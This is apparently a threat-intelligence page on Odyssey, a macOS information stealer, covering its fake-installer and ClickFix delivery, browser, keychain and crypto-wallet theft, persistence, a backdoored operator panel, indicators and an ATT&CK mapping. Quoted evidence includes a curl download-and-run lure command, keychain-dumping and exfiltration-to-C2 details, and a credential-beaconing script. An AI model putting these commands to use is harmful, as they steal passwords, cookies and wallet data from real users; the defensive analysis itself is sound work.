Malware

Odyssey

Odyssey is a macOS information stealer and malware-as-a-service (MaaS) offering. The reporting describes it as a rebrand and successor of Poseidon Stealer, which itself forked from Atomic macOS Stealer (AMOS). It is part of the broader AMOS/Poseidon/Odyssey macOS stealer family and is consistently associated with theft of browser cookies, saved credentials, authentication tokens, cryptocurrency wallet data, and other user information.

Observed delivery methods are heavily social-engineering driven. Odyssey has been distributed through weaponized DMG installers disguised as legitimate software, including fake branded installers that instruct users to bypass Gatekeeper protections. It has also been delivered through ClickFix-style phishing pages impersonating brands such as TradingView, Microsoft Teams, and Spectrum, where victims are tricked into copying and executing malicious commands in Terminal or via osascript. Reported hosting and lure domains tied to Odyssey campaigns include teamsonsoft[.]com, tradingview.connect-app[.]us[.]com, treadingveew.dekstop-apps[.]com, treadingveew.last-desk[.]org, claudflurer[.]com, emailreddit[.]com, cloudlare-lndex[.]com, and tradingviewen[.]com.

Functionally, Odyssey steals data from Safari, Chromium-based browsers, and Gecko-based browsers. Reported collected artifacts include Cookies.binarycookies, Form Values, Cookies, Web Data, Login Data, Local Extension Settings, IndexedDB data, cookies.sqlite, formhistory.sqlite, key4.db, and logins.json. It specifically targets MetaMask by locating and copying its IndexedDB storage. It also steals Apple Notes data, login keychains, and local passwords, including use of dscl . authonly to validate the local password and a fake prompt reading "Required Application Helper. Please enter device password to continue." to capture credentials. In one documented campaign it attempted to retrieve the Chrome keychain item and stored captured passwords in ~/.pwd.

Odyssey also targets cryptocurrency users extensively. Reporting states it recursively copies data from desktop wallets including Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, and Ledger Live, and also collects Binance and TonKeeper configuration paths. In the CloudSEK-tracked campaign, stolen data was mirrored into temporary directories, archived to /tmp/out.zip using ditto -c -k, and exfiltrated via HTTP POST to http://185.93.89.62/log with custom headers including username: vipx and repeat: false.

Persistence and follow-on behavior have also been documented. Odyssey established persistence by installing a randomly named com.<random>.plist LaunchDaemon under /Library/LaunchDaemons/ and invoking launchctl bootstrap system. The same campaign replaced /Applications/Ledger Live.app with a trojanized version downloaded from C2 infrastructure. Additional reported Odyssey C2 or related infrastructure includes 45.146.130[.]129 and 185.93.89[.]62.

Research into Odyssey operator infrastructure identified live administration panels on 86.54.25[.]202 and 86.54.25[.]204 hosted on a Kazakhstan subnet associated with AS210006 (GOODTEC). One panel was itself backdoored by another threat actor via injected JavaScript that intercepted POST requests to /api/v1/sign-in and exfiltrated operator cookies and credentials to scan-tron[.]link on 107.189.23[.]185. Analysis of a clean panel exposed 29 Odyssey API routes and showed functionality for bot management, AppleScript payload building, stolen log management, SOCKS proxy management, Telegram and FTP exfiltration settings, guest access, admin controls, seed phrase handling, and an /api/v1/admin/safe-exit emergency teardown capability. The panel code also referenced vash-server[.]com as a default server configuration placeholder.

High-confidence indicators mentioned in the reporting include: 185.93.89.62, 45.146.130[.]129, 86.54.25[.]202, 86.54.25[.]204, scan-tron[.]link, vash-server[.]com, teamsonsoft[.]com, and the SHA-256 hashes 95c17869073bff8a045083315c97583cb0d4f4c19165e657ed584ef7e16868a1 (backdoored Odyssey panel bundle) and 6c0c64c2da550ecab6eb9b855afe2833fde8f928a37168b7e4527665a9a7ae47 (clean Odyssey panel bundle).

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

MITRE ATT&CK

Techniques & procedures

31 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1078Valid AccountsEvidence1

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1195.002Compromise Software Supply ChainEvidence1

MITRE ATT&CK Mapping The Backdoor (scan-tron.link targeting Odyssey operators) Tactic Technique ID Initial Access Supply Chain Compromise T1195.002

T1566PhishingEvidence1

These attacks rely on fake software installers disguised as legitimate apps, tricking users into handing over access without raising any alarm.

Execution

4 techniques

T1053.003CronEvidence1

LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003)

T1059.002AppleScriptEvidence2

One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002)

T1059.004Unix ShellEvidence1

The command that’s copied for macOS devices instructs the system to... curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update ... chmod +x /tmp/update ... Run the downloaded file /tmp/update.

T1204User ExecutionEvidence1

A malicious one looks identical but includes instructions on how to override Gatekeeper, Apple’s tool for verifying trusted software.

Persistence

5 techniques

T1053.003CronEvidence1

T1078Valid AccountsEvidence1

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1543.004Launch DaemonEvidence1

T1547Boot or Logon Autostart ExecutionEvidence1

Per-bot actions: make persistent (survives reboot), execute remote shell commands, enable SOCKS proxy, re-run stealer.

T1556Modify Authentication ProcessEvidence1

MITRE ATT&CK Mapping The Backdoor (scan-tron.link targeting Odyssey operators) ... Defense Evasion Modify Authentication Process T1556

Privilege Escalation

4 techniques

T1053.003CronEvidence1

T1078Valid AccountsEvidence1

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1543.004Launch DaemonEvidence1

T1547Boot or Logon Autostart ExecutionEvidence1

Per-bot actions: make persistent (survives reboot), execute remote shell commands, enable SOCKS proxy, re-run stealer.

Stealth

3 techniques

T1036MasqueradingEvidence2

Attackers invest heavily in making fake installers look exactly like the real thing, complete with branded graphics and instructions guiding victims to bypass Apple’s built-in protections.

T1070.004File DeletionEvidence1

Cleans up the working dir and /tmp/out.zip after upload. (T1070.004)

T1078Valid AccountsEvidence1

Stashes the captured password at ~/.pwd. (T1555, T1078)

Defense Impairment

1 technique

T1556Modify Authentication ProcessEvidence1

MITRE ATT&CK Mapping The Backdoor (scan-tron.link targeting Odyssey operators) ... Defense Evasion Modify Authentication Process T1556

Credential Access

9 techniques

T1056.002GUI Input CaptureEvidence1

Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110)

T1056.003Web Portal CaptureEvidence1

When the wrapper sees a POST request to /api/v1/sign-in, it extracts username and password from the request body Sends both to https://scan-tron[.]link/l?d=

T1110Brute ForceEvidence1

T1539Steal Web Session CookieEvidence3

Credentials, browser cookies, authentication tokens, and crypto wallets are all fair game.

T1555Credentials from Password StoresEvidence2

Stashes the captured password at ~/.pwd. (T1555, T1078)

T1555.001KeychainEvidence1

Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001)

T1555.003Credentials from Web BrowsersEvidence1

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.) Walks every Default/Profile * profile and copies: Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)

T1556Modify Authentication ProcessEvidence1

MITRE ATT&CK Mapping The Backdoor (scan-tron.link targeting Odyssey operators) ... Defense Evasion Modify Authentication Process T1556

T1649Steal or Forge Authentication CertificatesEvidence1

Credentials, browser cookies, authentication tokens, and crypto wallets are all fair game.

Discovery

2 techniques

T1082System Information DiscoveryEvidence1

Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082)

T1614System Location DiscoveryEvidence1

if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian; then IS_CIS="true" fi ... if [ "$IS_CIS" = "true" ]; then send_debug_event "cis_blocked" ... exit 0 fi

Collection

7 techniques

T1005Data from Local SystemEvidence2

Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005)

T1056.002GUI Input CaptureEvidence1

T1056.003Web Portal CaptureEvidence1

When the wrapper sees a POST request to /api/v1/sign-in, it extracts username and password from the request body Sends both to https://scan-tron[.]link/l?d=

T1074Data StagedEvidence1

Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)

T1113Screen CaptureEvidence1

Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113)

T1119Automated CollectionEvidence1

T1560Archive Collected DataEvidence1

Archives everything to /tmp/out.zip via ditto -c -k. (T1560)

Command and Control

2 techniques

T1090.001Internal ProxyEvidence1

SOCKS Proxy : Turn infected Macs into SOCKS proxies filtered by country code. Proxy URL generation for direct use.

T1105Ingress Tool TransferEvidence1

Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105)

Exfiltration

2 techniques

T1041Exfiltration Over C2 ChannelEvidence3

Instead, they run a smash-and-grab, pulling sensitive data and sending it off to a remote server before the victim notices.

T1567Exfiltration Over Web ServiceEvidence1

Sends everything to https://scan-tron[.]link/c?d= as a URL-encoded JSON blob via an invisible Image() beacon ... Sends both to https://scan-tron[.]link/l?d= via the same Image beacon technique

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

4 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other

4 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app1 month ago

ip.v4●●●●●●●●●●●●View more in app1 month ago

uri●●●●●●●●●●●●View more in app1 month ago

domain●●●●●●●●●●●●View more in app1 month ago

uri●●●●●●●●●●●●View more in app4 months ago

ACTIVITY FEED

Recent activity

13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

13 SOURCESView more in app

cyber security newsNews

Jun 11, 2026

Hackers Use Weaponized DMG Files to Target macOS Users With Infostealer Malware - Cyber Security News

A macOS infostealer used in fake installer campaigns leveraging weaponized DMG files to trick users into approving execution and rapidly exfiltrate sensitive information.

breakglass intelNews

Apr 20, 2026

Someone Is Stealing From the Stealers: A Backdoored Odyssey macOS Panel Leaks Operator Credentials to scan-tron.link - Breakglass Intelligence - Breakglass Intelligence

A macOS infostealer platform with an operator panel supporting bot management, credential and cookie theft, seed phrase extraction, SOCKS proxying, AppleScript payload building, log export, persistence, and remote shell/tasking capabilities.

walmart global tech infosecNews

Apr 6, 2026

Shub Stealers Fake Crypto Apps. By: Jason Reaves | by Jason Reaves | Walmart Global Tech Blog | Apr, 2026 | Medium

Referenced as a related macOS infostealer variant with similar behavior to Shub Stealer.

jamf threat labsNews

Dec 22, 2025

From ClickFix to code signed: the quiet shift of MacSync Stealer malware

Odyssey is a macOS infostealer that, like MacSync Stealer, has adopted code-signed and notarized application delivery methods to evade detection and improve infection rates.

+9 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching8

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping31

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.